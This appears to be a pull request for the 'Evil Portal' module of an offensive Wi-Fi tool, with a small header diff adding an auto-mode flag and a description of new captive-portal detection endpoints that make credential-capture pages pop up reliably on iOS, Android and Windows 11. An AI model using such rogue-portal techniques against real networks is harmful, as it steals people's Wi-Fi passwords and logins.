### PR TITLE
Evil portal

### DIFF
--- a/src/modules/wifi/evil_portal.h
+++ b/src/modules/wifi/evil_portal.h
@@ -10,9 +10,7 @@ class EvilPortal {
     public:
         CaptiveRequestHandler(EvilPortal *portal) : _portal(portal) {}
         virtual ~CaptiveRequestHandler() { _portal = nullptr; }
-        bool canHandle(AsyncWebServerRequest *request) {
-            return true;
-        }; // request->addInterestingHeader("ANY");
+        bool canHandle(AsyncWebServerRequest *request) { return true; }
         void handleRequest(AsyncWebServerRequest *request);
 
     private:
@@ -20,15 +18,9 @@ class EvilPortal {
     };
 
 public:
-    /////////////////////////////////////////////////////////////////////////////////////
-    // Constructor
-    /////////////////////////////////////////////////////////////////////////////////////
-    EvilPortal(String tssid = "", uint8_t channel = 6, bool deauth = false, bool verifyPwd = false);
+    EvilPortal(String tssid = "", uint8_t channel = 6, bool deauth = false, bool verifyPwd = false, bool autoMode = false);
     ~EvilPortal();
 
-    /////////////////////////////////////////////////////////////////////////////////////
-    // Operations
-    /////////////////////////////////////////////////////////////////////////////////////
     bool setup(void);
     void beginAP(void);
     void setupRoutes(void);
@@ -39,7 +31,8 @@ private:
     uint8_t _channel;
     bool _deauth;
     bool isDeauthHeld = false;
-    bool _verifyPwd; // From PR branch
+    bool _verifyPwd;
+    bool _autoMode;
     AsyncWebServer webServer;
 
     DNSServer dnsServer;
@@ -57,6 +50,9 @@ private:
     int previousTotalCapturedCredentials = -1;
     String capturedCredentialsHtml = "";
     bool verifyPass = false;
+
+    // Track handler for cleanup
+    CaptiveRequestHandler* _captiveHandler = nullptr;
 
     void portalController(AsyncWebServerRequest *request);
     void credsController(AsyncWebServerRequest *request);


### PR DESCRIPTION
Proposed Changes

Improves captive portal compatibility with modern devices (iOS, Android, Windows 11) by adding comprehensive detection endpoints that trigger portal popups reliably. The original implementation often failed to trigger notifications on newer devices.

Types of Changes

Enhancement to Evil Portal functionality

Verification

Launching a default or custom evil portal attack now triggers the corresponding captive portal notification consistently even on newer devices.

Testing

Ran Evil Portal with default and custom HTML pages across different device types. Verified credential capture works and portal exits cleanly.

Linked Issues

N/A

User-Facing Change

```release-note
Enhanced Evil Portal captive portal detection - now reliably triggers on all modern devices including iOS, Android, and Windows 11
```

Further Comments

Added standard captive portal endpoints that modern OSes check for: /generate_204, /hotspot-detect.html, /ncsi.txt, /connecttest.txt, and others. Also improved the notFound handler to properly redirect detection requests.